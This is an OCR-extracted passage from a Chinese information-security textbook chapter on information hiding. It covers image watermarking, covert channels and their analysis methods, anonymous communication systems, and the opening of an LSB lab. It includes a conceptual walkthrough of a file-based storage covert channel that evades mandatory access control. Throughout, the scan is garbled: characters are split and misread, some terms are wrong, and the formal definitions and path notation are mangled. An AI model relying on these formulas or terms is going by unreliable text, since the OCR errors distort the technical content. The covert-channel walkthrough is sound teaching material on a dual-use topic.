Patchwork 方法 对 JPEG 压缩 FIR 滤波 及 图 像 裁 前 有 一 定 的 抵抗 力 ,但 该 方法 嵌入 的 信息 
量 有 限 。 为 了 嵌入 更 多 的 水 印信 息 , 可 以 将 图 像 分 块 ,然后 对 每 一 个 图 像 块 进行 附 入 操作 。 
还 有 一 种 适用 于 文档 类 数据 的 数字 水 印 算法 ,主要 是 通过 轻微 改变 字符 间距 \ 行 间距 ,或 增 
加 删除 字符 特征 (如 底 纹 线 ) 等 方法 来 嵌入 水 印 , 或 是 在 符号 级 或 语义 级 加 入 水 印 。 例 如 ， 
可 以 用 big 替换 文本 中 的 large。 图 4-12 给 出 了 一 幅 LSB 法 嵌入 水 印 图 像 的 示例 。 


Copyright 


(a) 未 嵌入 水 印 (b) 嵌入 水 印 后 (c) 被 隐藏 的 水 印 
4-12 LSB 法 嵌入 水 印 图 像 示例 


(2) 变换 ( 频 ) 域 算法 。 与 信息 隐藏 算法 类 似 , 空 间 域 算法 存在 鲁 棒 性 差 、 抗 攻击 能 力 差 
等 缺点 ,采用 变换 域 算法 嵌入 水 印 , 可 大 大 提高 健壮 性 。 常 用 的 频 域 水 印 算法 有 DFT、DCT 
和 DWT 等 。 该 类 水 印 算法 与 信息 隐藏 的 变换 域 算法 相似 ,隐藏 和 提取 信息 操作 复杂 ,隐藏 
信息 量 不 能 很 大 ,但 抗 攻击 能 力 强 。 

图 4-13 给 出 了 一 幅 图 像 用 DCT 域 变 换 法 嵌入 水 印 的 示例 。 
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(a) 未 嵌入 水 印 (b) 说 入 水 印 后 (c) 被 隐藏 的 水 印 
图 4-13 DCT 域 变 换 隐藏 水 印 图 像 对 比 


4.5 隐 通 道 技术 


由 于 隐 通 道 问题 在 信息 安全 方面 特别 是 机 密 性 信息 的 泄露 方面 的 重要 性 ,美国 国防 部 
可 信 计 算 机 系统 评估 准则 (TCSEC) 中 规定 ,在 B2 及 以 上 安全 级 别 的 安全 系统 设计 和 开发 
过 程 中 ,必须 进行 隐 通 道 分 析 。 系 统 中 存在 的 隐 通 道 能 够 使 得 攻击 者 绕 过 所 有 的 安全 保护 
机 制 而 妨害 系统 的 机 密 性 。 


4.5.1 隐 通 道 的 概念 


隐 通 道 的 概念 最 初 是 由 Lampson 于 1973 年 提出 的 ,从 那 以 后 ,有 不 同 定义 试图 从 不 同 
角度 来 描述 隐 通 道 的 本 质 和 特性 。TCSEC( 可 信 计 算 机 系统 评价 标准 ) 中 给 出 的 定义 是 “能 
让 一 个 进程 以 违反 系统 安全 策略 的 方式 传递 消息 的 信息 通道 ”。 也 就 是 说 , 隐 通 道 是 指 在 系 
统 中 利用 那些 本 来 不 是 用 于 通信 的 系统 资源 , 绕 过 强制 存 取 控 制 进行 非法 通信 的 信息 信道 ， 
并 且 这 种 通信 方式 往往 不 被 系统 的 存 取 控 制 机 制 所 检测 和 控制 。 

定义 4-3 隐 通 道 是 指 系统 用 户 用 违反 系统 安全 策略 的 方式 传送 信息 给 另 一 用 户 的 机 
制 , 在 一 个 系统 中 ,给 定 一 个 安全 策略 模型 (如 强制 安全 模型 ) M 及 其 解释 TCM) ,TCM) 中 的 
任何 两 个 主体 1(S;) 和 了 I(S;) 之 间 的 任何 潜在 的 通信 和 是 隐蔽 的 , 当 且 仅 当 两 个 相应 主体 5， 
和 S; 的 任何 通信 在 安全 模型 M 中 是 非法 的 。 

从 本 质 上 来 说 , 隐 通 道 的 存在 反映 了 安全 系统 在 设计 时 所 遵循 的 安全 模型 的 信息 安全 
要 求 与 该 系统 实现 时 所 表现 的 安全 状况 之 间 的 差异 是 客观 存在 的 。 由 于 现实 系统 的 复杂 性 
及 该 系统 设计 时 在 性 能 和 兼容 性 方面 的 考虑 因素 ,使 得 严格 遵守 某 安全 策略 模型 是 不 现实 
的 。 这 就 是 目前 所 有 的 安全 系统 所 实现 的 安全 机 制 都 是 某 个 安全 模型 在 一 定 程度 上 的 近似 。 
事实 说 明 , 没 有 绝对 安全 的 系统 , 隐 通 道 问题 的 提出 与 解决 是 为 了 缓解 和 限制 这 种 隐患 。 


4.5.2 隐 通 道 的 分 类 

隐 通 道 的 分 类 主要 有 3 种 方法 。 根 据 隐 通道 的 形成 , 隐 通 道 可 分 为 存储 隐 通 道 
(storage covert channels) 和 时 间 隐 通道 (timing covert channels); 根据 隐 通 道 是 否 存 在 噪 
声 , 隐 通 道 可 分 为 噪声 隐 通 道 (noisy covert channels) 和 无 噪声 隐 通 道 Cnoiseless covert 
channels); 根据 隐 通 道 所 涉及 的 同步 变量 或 信息 的 个 数 , 隐 通道 可 分 为 聚集 隐 通 道 
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(aggregated covert channels) 和 非 聚 集 隐 通 道 Cnoaggregated covert channels)。 下 面 对 这 几 
种 分 类 方法 分 别 进行 介绍 。 

1. 存储 隐 通 道 和 时 间 隐 通道 

如 果 一 个 隐 通 道 涉及 对 一 些 系 统 资源 或 资源 属性 的 操作 (如 是 否 使 用 了 一 个 文件 ) , 接 
收 方 通过 观察 该 资源 及 其 属性 的 变化 来 接收 信息 所 形成 的 隐 通 道 , 则 称 为 存储 隐 通 道 。 接 
收 方 通过 感知 时 间 变 化 来 接收 信息 所 形成 的 隐 通 道 , 则 称 为 时 间 隐 通道 。 它 们 最 突出 的 区 
别 是 : 时 间 隐 通道 需要 一 个 计时 基准 ,而 存储 隐 通 道 不 需要 。 在 具有 高 安全 级 别 的 发 送 进 
程 与 具有 低 安 全 级 别 的 接收 进程 之 间 ,存储 隐 通 道 和 时 间 隐 通道 的 存在 均 要 求 系统 满足 一 
定 的 条 件 。 

形成 存储 隐 通 道 的 基本 条 件 如 下 。 

(1) 发 送 者 和 接收 者 必须 能 存 取 一 个 共享 资源 的 相同 属性 。 

(2) 发 送 者 必须 能 够 通过 某 种 途径 使 共享 资源 的 共享 属性 改变 状态 。 

(3) 接收 者 必须 能 够 通过 某 种 途径 感知 共享 资源 的 共享 属性 的 改变 。 

(4) 必须 有 一 个 初始 化 发 送 者 与 接收 者 通信 及 顺序 化 发 送 与 接收 事件 的 机 制 。 

下 面 以 利用 文件 读 写 进行 信息 传输 的 存储 隐 通 道 为 例 进行 简单 介绍 。 

如 图 4-14 所 示 ,在 一 个 安全 操作 系统 中 ,用 户 A 的 安全 级 别 为 H( 高 级 别 ), 用 户 B 的 
安全 级 别 为 L( 低 级 别 ) ,File A 的 安全 级 别 为 H,File B 的 安全 级 别 为 L, 系 统 采用 强制 访问 
控制 机 制 ,主体 不 可 读 安全 级 别 高 于 它 的 数据 ,主体 不 可 写 安全 级 别 低 于 它 的 数据 ,也 就 是 
“下 读 上 写 ” 的 安全 策略 模型 。 按 如 下 步骤 ,就 可 以 完成 信息 的 交换 。 

H 级 别 


痰 | 写 二 
| pA | 


H 级 别 (、 用 户 A 用 户 B L 级 别 


”| FieB ~ 
[级 别 


读 读 / 写 


4-14 ”基于 “下 读 上 写 " 安 全 策略 的 隐 通 道 


第 一 步 ,用 户 B 在 File A 中 写 人 “Start" 字 符 串 ,表明 信息 传输 开始 。 

第 二 步 ,用 户 A 监控 File A, 当 它 发 现 File A 中 出 现 “Start” 字 符 串 时 ,表明 已 经 和 用 户 
B 同步。 

第 三 步 ,用 户 A 读 文件 File B, 表 示 传 输 二 进 制 1; 用 户 A 不 读 文件 File B, 表 示 传 输 二 
进 制 0, 同 时 监控 File A。 

第 四 步 ,用 户 B 尝试 写 File B, 当 它 写 失败 时 ,表示 用 户 A 正在 读 File B, 即 表示 传输 了 
二 进 制 1, 否 则 就 是 二 进 制 0, 用 户 B 将 该 二 进 制 信息 写 入 File A。 

第 五 步 , 当 用 户 A 监控 到 File A 被 写 人 了 数据 后 ,可 以 通过 检查 数据 知道 用 户 B 收 到 
的 信息 是 否 正确 ,然后 进行 第 二 个 数据 的 传输 。 

第 六 步 , 反 复 进行 第 三 步 至 第 五 步 操作 ,直到 信息 传输 完 

第 七 步 , 信 息 传输 完毕 后 ,用 户 B 在 File A 中 写 和 人 “End”, 表 示 传 输 结束 。 

第 八 步 ,用 户 A 监控 到 File A 中 出 现 *End” 字 符 串 后 ,结束 传输 。 
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形成 时 间 隐 通道 的 基本 条 件 如 下 。 

(1) 发 送 者 和 接收 者 必须 能 存 取 一 个 共享 资源 的 相同 属性 。 

(2) 发 送 者 和 接收 者 必须 能 存 取 一 个 时 间 基 准 , 如 实时 时 钟 。 

(3) 发 送 者 必须 能 够 调整 自己 的 响应 时 间 ,使 其 为 感知 共享 资源 的 共享 属性 改变 的 接 
收 者 响应 时 间 。 

(4) 必须 有 一 个 初始 化 发 送 者 与 接收 者 通信 及 顺序 化 发 送 与 接收 事件 的 机 制 。 

值得 注意 的 是 : 有 一 些 隐 通 道 同时 表现 出 了 存储 隐 通 道 和 时 间 隐 通道 的 特性 (如 磁 臂 
隐 通 道 )。 通 常 ,一 些 存 储 资源 与 一 些 临 时 行为 (如 查找 时 间 ) 相 关 , 所 以 涉及 对 它们 的 操纵 
同时 表现 出 了 存储 隐 通 道 和 时 间 隐 通道 的 特性 。 并 且 , 时 间 隐 通道 中 的 时 间 基 准 是 一 个 很 
宽松 的 概念 ,接收 者 能 够 感知 事件 发 生 顺 序 和 发 送 者 能 够 影响 事件 发 生 顺 序 的 机 制 都 可 称 
为 时 间 基 准 。 

2. 了 噪声 隐 通 道 和 无 噪声 隐 通 道 

在 一 个 隐 通 道中 ,如 果 信 息 发 送 者 发 送 的 信息 能 够 被 接收 方 完全 正确 接收 ,也 就 是 信息 
发 送 者 所 发 送 的 信息 与 接收 者 所 接收 的 信息 一 致 ,那么 这 个 隐 通 道 可 称 为 无 噪声 隐 通 道 。 
如 果 信 息 发 送 者 发 送 的 信息 被 接收 方正 确 接收 的 概率 小 于 1, 也 就 是 接收 者 所 接收 的 信息 
要 少 于 信息 发 送 者 所 发 送 的 信息 ,那么 这 个 隐 通 道 称 为 噪声 隐 通 道 。 品 声 隐 通 道 所 传送 的 
有 效 信息 量 要 少 些 , 可 以 通过 使 用 纠 错 码 将 噪声 隐 通 道 转变 为 无 噪声 隐 通 道 , 但 是 这 种 转变 
在 降低 传输 出 错 率 的 同时 限制 了 原 有 的 通道 容量 。 

3. 聚集 隐 通 道 和 非 聚 集 隐 通 道 

在 一 个 隐 通 道中 ,为 实现 数据 通信 ,多 个 数据 变量 (作为 一 个 组 ) 作 为 同步 变量 或 信息 ， 
这 样 的 隐蔽 通道 称 为 聚集 隐蔽 通道 ,反之 称 为 非 聚集 隐蔽 通道 。 非 聚集 隐蔽 通道 也 称 为 单 
一 隐 通 道 , 它 仅 影响 单独 的 数据 变量 。 根 据 通信 双方 进程 设置 . 读 取 和 重 置 数据 变量 的 方 
式 , 可 以 采用 序列 、 并 行 或 混合 方式 形成 聚集 信息 传输 通道 以 获得 最 大 带宽 。 为 获得 最 大 带 
宽 ,并 行 聚集 隐 通 道 变量 要 求 在 不 同 处 理 器 上 对 通信 进程 进行 组 调用 ,否则 带宽 会 降 至 序列 
聚集 通道 的 水 平 。 在 多 处 理 器 操作 系统 和 多 工作 站 系统 中 均 能 够 实现 组 调用 ,这 种 情况 下 ， 
仅 分 析 单 独 的 隐 通 道 是 无 法 确定 隐 通 道 的 最 大 带宽 的 。 


4.5.3 隐 通 道 分 析 方 法 


隐 通 道 识别 技术 是 建立 在 识别 顶层 设计 描述 和 系统 源 代 码 中 非法 信息 流 的 思想 基础 之 
上 的 ,该 思想 最 先 由 Denning 和 Millen 提出 ,之 后 Andrews 和 Reitman 对 程序 语言 信息 流 
分 析 方 法 进行 了 扩展 ,将 其 进一步 用 于 分 析 并 行程 序 描述 细则 。 现 在 应 用 比较 广泛 的 分 析 
方法 主要 有 信息 流 分 析 方 法 、 非 干扰 分 析 方 法 和 共享 资源 矩阵 方法 ,下 面 分 别 作 简单 介绍 。 

1. 信息 流 分 析 方 法 

信息 流 分 析 方 法 是 在 信息 流 模 型 的 基础 上 提出 的 ,也 是 最 基本 的 方法 ,包括 信息 流 句法 
分 析 方 法 和 信息 流 文法 分 析 方 法 。 信 息 流 分析 方 法 能 检测 出 合法 通道 和 存储 隐 通 道 , 不 能 
检测 时 间 隐 通道 。 

信息 流 句法 分 析 方 法 的 基本 思想 是 : 将 信息 流 策略 运用 于 语句 或 代码 以 产生 信息 流 公 
式 , 这 些 信 息 流 公式 必须 能 够 被 证 明 是 正确 的 ,正确 性 无 法 得 到 证 明 的 信息 流 即 可 能 产生 隐 
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通道 。 该 分 析 方 法 的 优点 是 : 易于 实现 自动 化 ; 可 用 于 形式 化 项 层 描 述 和 源 代码 分 析 ; 可 
用 于 单独 的 可 信 计 算 基 (Trusted Computing Base,TCB) 功 能 和 原 语 ; 不 遗漏 任何 会 造成 隐 
通道 的 信息 流 。 但 是 ,该 方法 也 有 其 相应 的 局 限 性 ,主要 有 : 对 发 现 并 减少 伪 非 法 信息 流 具 
有 脆弱 性 ; 对 非 形式 化 描述 的 作用 有 限 ; 无 法 判断 隐 通 道 处 理 代 码 在 TCB 中 的 正确 位 置 。 

相对 来 说 ,信息 流 文法 分 析 方 法 克服 了 信息 流 句法 分 析 方 法 的 某 些 不 足 之 处 , 它 使 用 系 
统 强制 安全 模型 的 源 代 码 ,能 够 确定 未 经 证 明 的 信息 流 是 真正 的 违法 信息 流 及 使 用 该 信息 
流 将 造成 真正 的 隐 通 道 。 此 外 , 它 还 能 够 帮助 确认 隐 通 道 处 理 代码 在 TCB 中 的 正确 位 置 。 
当然 ,这 种 方法 也 有 缺点 ,主要 是 : 对 分 析 人 员 的 技术 水 平 要 求 高 ; 由 于 它 在 实际 应 用 中 要 
求 使 用 针对 不 同 语言 设计 的 句法 分 析 器 和 信息 流产 生 器 等 自动 化 工具 ,因而 实用 性 有 限 。 

2. 非 干扰 分 析 方 法 

非 干扰 分 析 方 法 将 TCB 视 为 一 个 抽象 机 .用 户 进程 的 请 求 代表 该 抽象 机 的 输入 ,TCB 
的 响应 代表 该 抽象 机 的 输出 ,TCB 内 部 变量 的 内 容 构 成 该 抽象 机 的 当前 状态 。 每 一 个 TCB 
的 输入 都 会 引起 TCB 状态 的 变化 和 相应 的 输出 。 当 发 生 这 样 的 情况 时 , 称 两 个 进程 A 和 B 
之 间 是 无 干扰 的 。 对 于 进程 A 和 进程 BB, 如果 取消 来 自 进 程 A 的 所 有 TCB 状态 机 的 输入 ， 
则 进程 B 所 观察 到 的 TCB 状态 机 的 输出 并 没有 任何 变化 ,也 就 是 进程 A 和 进程 B 之 间 没 
有 传递 任何 信息 。 

非 干 扰 分 析 方 法 的 优点 是 : 可 同时 用 于 形式 化 TCB 的 描述 细则 和 源 代码 分 析 ; 可 避免 
分 析 结 果 中 含有 伪 非 法 信息 流 ; 可 逐渐 被 用 于 更 多 单独 的 TCB 功能 和 原 语 。 

非 干 扰 分 析 方 法 的 缺点 是 : 该 方法 是 一 种 乐观 的 分 析 方 法 , 即 以 证 明 TCB 的 描述 细则 
或 代码 中 不 存在 干扰 进程 为 目的 , 仅 适用 于 封闭 的 可 信 进 程 TCB 描述 而 不 是 含有 大 量 共 享 
变量 的 TCB 描述 ; 允许 不 要 求 分 析 形 式 化 描述 细则 或 源 代 码 的 系统 (B2 至 B3 级 系统 ) 不 
使 用 该 方法 ,只 有 一 部 分 Al 级 系统 设计 要 求 对 源 代码 进行 隐 通 道 识别 。 

3. 共享 资源 矩阵 方法 

共享 资源 矩阵 (Shared Resource Matrix,SRM) 方 法 最 初 由 Kemmerer 于 1983 年 提出 。 
该 方法 的 基本 思想 是 : 根据 系统 中 可 能 与 隐 通 道 相关 的 共享 资源 产生 一 个 共享 资源 矩阵 ， 
通过 分 析 该 矩阵 发 现 可 能 造成 隐 通 道 的 系统 设计 缺陷 。 具 体 实 现 方法 是 建立 一 个 表示 系统 
资源 与 系统 操作 之 间 读 写 关 系 的 矩阵 , 行 项 是 系统 资源 及 其 属性 , 列 项 是 系统 的 操作 原 请 。 
矩阵 的 每 一 项 表示 给 定 操 作 原 语 是 否 读 或 写 对 应 的 系统 资源 ,并 分 析 该 矩阵 。 

共享 资源 矩阵 方法 的 优点 是 : 具有 广泛 的 适用 性 ,不 但 可 以 用 于 代码 分 析 , 还 可 以 用 了 
规范 分 析 , 甚 至 是 模型 和 机 器 代码 分 析 。 

共享 资源 矩阵 的 缺点 是 : 构造 共享 资源 矩阵 工作 量 大 ; 没有 有 效 的 构造 工具 ; 不 能 证 
明 单 独 一 个 原 语 是 否 安全 。 


tl 


4.6 匿名 通信 技术 


4.6.1 匿名 通信 的 概念 
在 计算 机 网 络 环境 中 ,采用 加 密 的 方法 来 保护 传输 信息 的 机 密 性 ,但 是 , 仅 有 机 密 性 的 
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保护 是 不 够 的 ,在 一 些 特殊 的 场景 中 ,个 人 通信 的 隐私 是 非常 重要 的 ,也 需要 保护 。 例 如 ,在 
使 用 现金 购物 ,或 是 参加 无 记名 投票 选举 ,或 在 网 络 上 发 表 个 人 看 法 时 ,人 们 都 希望 能 够 对 
其 他 的 参与 者 或 者 可 能 存在 的 窃听 者 隐藏 自己 的 真实 身份 ,也 就 是 需要 采用 匿名 方式 进行 
保护 。 有 时 ,人 们 又 希望 自己 在 向 其 他 人 展示 自己 身份 的 同时 ,阻止 其 他 未 授权 的 人 通过 通 
信 流 分 析 等 手段 发 现 自己 的 身份 。 例 如 ,为 警方 检举 罪犯 的 目击 证 人 ,他 既 要 向 警方 证 明 
自己 的 真实 身份 ,同时 ,又 希望 不 要 泄露 自己 的 身份 。 事实 上 ,匿名 性 和 隐私 保护 已 经 成 
为 一 项 现代 社会 正常 运行 所 不 可 缺少 的 安全 需求 ,很 多 国家 已 经 对 隐私 权 进行 了 立法 
保护 。 

然而 在 现 有 的 Internet 世界 中 ,用 户 的 隐私 状况 却 一 直 令 人 担忧 。 目 前 Internet 网 络 
协议 不 支持 隐藏 通信 端 地 址 的 功能 。 能 够 访问 路 由 节点 的 攻击 者 可 以 监控 用 户 的 流量 特 
征 , 获 得 IP 地 址 ,使 用 一 些 跟踪 软件 甚至 可 以 直接 从 IP 地 址 追踪 到 个 人 用 户 。 采 用 SSL 
加 密 机 制 虽然 可 以 防止 其 他 人 获得 通信 的 内 容 , 但 是 这 些 机 制 并 不 能 隐藏 是 谁 发 送 了 这 些 
信息 。 

通俗 地 讲 , 匿 名 通信 就 是 指 不 能 确定 通信 方 身份 (包括 双方 的 通信 关系 ) 的 通信 技术 , 它 
保护 通信 实体 的 身份 。 严 格 地 讲 , 匿 名 通信 是 指 通过 一 定 的 方法 将 业务 流 中 的 通信 关系 加 
以 隐藏 ,使 窃听 者 无 法 直接 获知 或 推 知 双方 的 通信 关系 或 通信 双方 身份 的 一 种 通信 技术 。 
匿名 通信 的 重要 目的 就 是 隐藏 通信 双方 的 身份 或 通信 关系 ,从 而 实现 对 网 络 用 户 个 人 通信 
隐私 及 对 涉 密 通 信 的 更 好 的 保护 。 

1981 年 ,Chaum 提出 的 Mix 机 制 和 将 Dining Cryptographer 技术 应 用 于 匿名 系统 的 研 
究 工作 ,为 后 续 的 匿名 技术 研究 葛 定 了 良好 的 基础 ,之 后 出 现 了 很 多 关于 改进 Mix 技术 的 
研究 ,同时 提出 了 若干 匿名 通信 协议 及 匿名 通信 原型 系统 ,这 些 协议 和 原型 系统 都 在 一 定 程 
度 上 保证 了 匿名 连接 ,能 够 抵抗 一 定 程度 的 业务 流 分 析 攻 击 。 这 些 系统 按 其 底层 的 路 由 机 
制 可 分 为 基于 单 播 的 匿名 通信 系统 和 基于 广播 与 组 播 的 匿名 通信 系统 两 类 。 

随 着 电子 商务 .电子 政务 .网 络 银行 和 网 上 诊所 等 应 用 的 推广 和 普及 ,用 户 的 各 种 各 样 
的 匿名 性 需求 为 研究 者 提出 了 很 好 的 课题 ,这些 课题 的 研究 和 应 用 无 疑 又 反 过 来 促进 网 络 
应 用 的 广泛 开展 。 


4.6.2 匿名 通信 技术 的 分 类 


匿名 通信 技术 有 许多 不 同 的 分 类 方法 ,本 节 介绍 两 种 分 类 方法 ,如 图 4-15 所 示 。 

1. 按 隐匿 对 象 分 类 

根据 需要 隐匿 的 通信 对 象 不 同 ,匿名 通信 系统 可 分 为 发 送 者 匿名 (sender anonymity)、 
接收 者 匿名 (receiver anonymity) 、 通 信和 双方 匿名 (sender and receiver anonymity) 、 节 点 匿名 
(node anonymity) 和 代理 匿名 (proxy anonymity)。 

发 送 者 匿名 是 指 接收 者 不 能 辨认 出 原始 的 发 送 者 。 在 网 络 上 ,发 送 者 匿名 主要 是 通过 
使 发 送 消息 经 过 一 个 或 多 个 中 间 节 点 ,最 后 才 到 达 目 的 节点 的 方式 实现 的 。 这 样 ,发 送 者 的 
真实 身份 就 会 被 隐藏 。 

接收 者 匿名 是 指 即使 接收 方 可 以 辨别 出 发 送 方 ,发 送 者 也 不 能 确定 某 个 特定 的 消息 是 
被 哪个 接收 者 接收 的 。 

通信 双方 匿名 是 指 信息 发 送 者 和 信息 接收 者 的 身份 均 保密 。 


第 4 章 信息 隐藏 技术 91 


发 送 者 匿名 


接收 者 匿名 


按 隐匿 对 象 分 类 | 十 -| 通信 双方 匿名 


节点 匿名 


匿名 通信 系统 代理 匿名 


广播 式 (组 播 式 ) 路 由 匿名 通信 系统 


基于 路 由 的 匿名 通信 系统 


on 重 路 由 匿名 通信 系统 


按 技术 分 类 


站 | 秘密 共享 机 制 匿名 通信 系统 


非 路 由 的 匿名 通信 系统 


其 他 


图 4-15 匿名 通信 技术 分 类 


节点 匿名 是 指 组 成 通信 信道 的 服务 器 的 匿名 性 , 即 信 息 流 所 经 过 线路 上 的 服务 器 的 身 
份 不 可 识别 ,要 求 第 三 方 不 能 确定 某 个 节点 是 否 与 任何 通信 连接 相关 。 

代理 匿名 是 指 某 一 节点 不 能 确定 为 是 发 送 者 和 接收 者 之 间 的 消息 载体 。 

2. 按 技术 分 类 

根据 所 采用 的 技术 ,匿名 通信 系统 可 分 为 基于 路 由 的 匿名 通信 系统 和 非 路 由 的 匿名 通 
信和 系统。 

基于 路 由 的 匿名 通信 系统 采用 网 络 路 由 技术 来 保证 通信 的 匿名 性 , 即 采用 路 由 技术 改 
变 信息 中 的 信息 源 的 真实 身份 ,从 而 保证 通信 匿名 。 依 据 所 采用 的 路 由 技术 不 同 , 又 可 分 为 
广播 式 (或 组 播 式 ) 路 由 匿名 通信 系统 和 重 路 由 匿名 通信 系统 。 广 播 式 (或 组 播 式 ) 路 由 匿名 
通信 系统 采用 广播 或 组 播 的 方式 ,借助 广播 或 组 播 的 多 用 户 特 征 ,形成 匿名 集 。 例 如 ,用 多 
个 接收 者 来 隐藏 真实 接收 者 。 重 路 由 匿名 通信 系统 采用 重 路 由 机 制 来 实现 匿名 ,这 种 机 制 
为 用 户 提 供 间 接 通信 ,多 个 主机 在 应 用 层 为 用 户 通信 存储 转发 数据 ,形成 一 条 由 多 个 安全 信 
道 组 成 的 虚拟 路 径 。 攻 击 者 无 法 获得 真实 的 发 送 者 和 接收 者 的 IP 地 址 信息 ,从 而 使 通信 实 
体 的 身份 信息 被 有 效 地 隐藏 起 来 。 

非 路 由 的 匿名 通信 系统 一 般 建立 在 Shamir 的 秘密 共享 机 制 基础 上 。Shamir 的 秘密 共 
享 机 制 允许 个 用 户 分 别 拥有 不 同 的 秘密 信息 , 当 达 到 一 定 人 数 的 秘密 信息 后 才能 恢复 完 
整 的 秘密 信息 , 且 这 个 完整 信息 并 不 显示 任何 人 单独 拥有 的 秘密 信息 。 非 路 由 的 匿名 通信 


4.6.3 重 路 由 匿名 通信 系统 


基于 重 路 由 的 技术 是 指 来 自发 送 者 的 消息 通过 一 个 或 多 个 中 间 节 点 ,最 后 才 达 到 接收 
者 的 技术 。 途 经 的 中 间 节 点 起 了 消息 转发 的 作用 ,它们 在 转发 的 时 候 ,会 用 自己 的 地 址 改写 
数据 包 中 的 源 地 址 项 ,这 样 ,拥有 有 限 监听 能 力 的 攻击 者 将 很 难 追 踪 数 据 包 , 不 易 发 现 消 息 
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的 初始 发 起 者 。 图 4-16 表示 了 一 个 基于 重 路 由 技术 的 匿名 通信 系统 模型 。 消 息 传递 所 经 
过 的 路 径 被 称 为 重 路 由 路 径 ,途经 的 中 间 转 发 节点 的 个 数 称 为 路 径 长 度 。 


WY © © 
© 
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图 4-16 基于 重 路 由 技术 的 匿名 通信 系统 模型 


一 个 基于 重 路 由 的 匿名 通信 系统 为 由 网 络 中 若干 个 提供 匿名 服务 的 主机 组 成 的 集合 ， 
设 为 V={v10 志 j 三 n} ,其 中 的 主机 ww 称 为 成 员 (participant) ,系统 中 的 成 员 数 为 |V|= 
n(n 宇 1)。 在 系统 运行 期 的 某 一 间隔 时 间 内 (如 1 小时) ,成 员 数 目 n 固定 为 一 个 常数 。 通 过 
安全 通信 信道 ,两 两 成 员 之 间 可 进行 直接 通信 。 需 要 匿名 通信 服务 的 用 户 选择 一 个 成 员 
seV 作为 其 代理 成 员 ,并 将 接收 者 的 地 址 传送 给 该 代理 成 员 , 由 该 代理 成 员 发 起 建立 一 条 由 
多 个 成 员 组 成 的 到 达 接 收 者 的 重 路 由 路 径 , 以 用 于 用 户 和 接收 者 之 间 的 间接 通信 。 形 式 化 
地 ,一 条 重 路 由 路 径 古 可 表示 为 = 《5, 卫 ,J,…,T,…, 攻 ,7) ,其 中 sEV 称 为 通信 的 发 送 
者 (sender),r 儿 FV 称 为 通信 的 接收 者 (recipient), 了 (IEV,1 三 t 志 LL) 为 中 继 节 点 
(intermediator) ,L(L 二 1,2,…) 为 重 路 由 路 径 所 经 过 的 中 间 节 点 数目 , 称 为 路 径 长 度 。 可 
以 看 到 ,图 4-16 中 ,系统 的 成 员 数 目 ==16, 重 路 由 路 径 分 别 为 帮 二 40,5,2,7,11,8,m) 和 
二 (410,3,9,re)。 其 中 ,成 员 0 与 5 分别 为 夏 、T2 的 发 送 者 ,路 径 长 度 分 别 为 Li 二 5 和 
< 


4.6.4 广播 式 和 组 播 式 路 由 匿名 通信 


广播 通信 和 是 指 在 网 络 上 将 分 组 发 往 整个 组 中 所 有 目的 地 的 传输 机 制 。 在 一 个 运用 了 广 
播 通 信 的 匿名 系统 中 ,所 有 的 用 户 都 以 固定 速率 向 一 个 广播 组 中 的 所 有 用 户 发 送 固定 长 度 
的 数据 包 。 这 些 数 据 包 都 是 被 加 密 的 。 为 了 保持 恒定 的 速率 ,没有 消息 包 发 送 的 用 户 将 发 
送 垃 圾 包 。 

该 技术 有 以 下 优点 。 

(1) 可 以 保证 接收 者 匿名 。 因 为 发 送 者 难以 确定 接收 者 是 在 整个 广播 组 中 的 哪 一 个 位 
置 或 接收 者 使 用 的 是 哪 台 主机 和 主机 地 址 , 它 只 知道 接收 者 是 广播 组 的 一 部 分 。 

(2) 可 以 保证 发 送 者 匿名 。 因 为 一 个 接收 者 所 接收 到 的 所 有 的 消息 都 来 自 一 个 上 游 的 
节点 , 它 不 能 够 确定 消息 的 初始 发 起 者 是 谁 。 

(3) 还 可 以 同时 保证 发 送 者 与 接收 者 之 间 的 不 相连 ,用 于 抵御 被 动 的 攻击 者 。 攻 击 者 
不 能 从 对 链 路 的 观察 分 析 中 获取 额外 的 信息 ,因为 消息 包 ( 包 括 垃圾 包 ) 是 以 恒定 的 速率 在 
链 路 上 传递 并 且 是 发 往 同一 个 广播 地 址 的 。 

该 技术 也 有 以 下 一 些 缺 陷 。 

(1) 效率 低 。 由 于 每 次 发 送 报 文 都 需要 所 有 成 员 参 与 ,因此 严重 降低 了 传输 的 效率 。 
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(2) 冲突 问题 。 假 设 同一 时 刻 不 止 一 个 参与 者 发 出 报 文 , 则 广播 的 是 所 有 报 文 之 和 ,这 
样 将 导致 所 有 报 文 信息 的 失效 。 

组 播 通信 是 网 络 上 一 点 对 多 点 的 传输 机 制 。 组 播 地 址 与 IP 地 址 不 同 , 它 不 是 附属 于 网 
络 的 一 个 特殊 的 装置 ,而 是 相当 于 接收 者 形成 的 组 的 这 个 整体 的 一 个 标签 。 一 系列 的 主机 
作为 接收 者 ,加 入 组 播 路 由 树 ,它们 的 状态 是 动态 的 ,同时 其 状态 也 不 为 路 由 器 和 其 他 的 主 
机 所 知 。 正 是 由 于 组 播 路 由 存在 着 这 些 性 质 , 可 以 利用 它 来 提供 匿名 服务 。Hordes 就 采用 
了 组 播 路 由 来 实现 匿名 连接 。 采 用 组 播 路 由 的 好 处 是 : 组 播 中 的 成 员 组 成 是 不 为 任何 其 他 
实体 所 知 的 。 它 需要 组 播 树 中 的 所 有 路 由 器 的 协作 ,才能 确定 接收 者 集合 。 对 于 攻击 者 来 
说 ,发 现 这 样 的 接收 者 集合 是 比较 困难 的 ,即使 某 个 组 播 的 成 员 组 成 被 发 现 了 ,由 于 那个 最 
初始 的 发 起 者 只 是 一 个 组 中 的 一 个 成 员 , 因 此 还 是 不 能 将 他 和 其 他 的 组 中 成 员 区 分 开 来 ,只 
要 他 不 是 这 个 组 中 唯一 的 成 员 ,就 不 能 确定 最 初始 的 发 起 者 。 


《E33 LSB 图 像 信息 隐藏 


M 实 训 目 的 

1. 了 解 信息 隐藏 中 最 常用 的 LSB 算法 的 特点 。 

2. 掌握 LSB 算法 原理 ,设计 并 实现 一 种 基于 图 像 的 LSB 隐藏 算法 。 

3. 了 解 如 何 通 过 峰值 信 品 比 来 对 图 像 进行 客观 评价 ,并 计算 峰值 信 品 比值 。 
4. 用 相应 的 软件 实现 信息 隐藏 。 


/ 实 训 环境 

1. Windows 7 操作 系统 。 

2. MATLAB R2013a 软件 。 
3. BMP 格式 灰 度 图 像 文件 。 


/原理 简介 

任何 多 媒体 信息 在 数字 化 时 都 会 产生 物理 随机 噪声 ,而 人 的 感官 系统 对 这 些 随机 噪声 
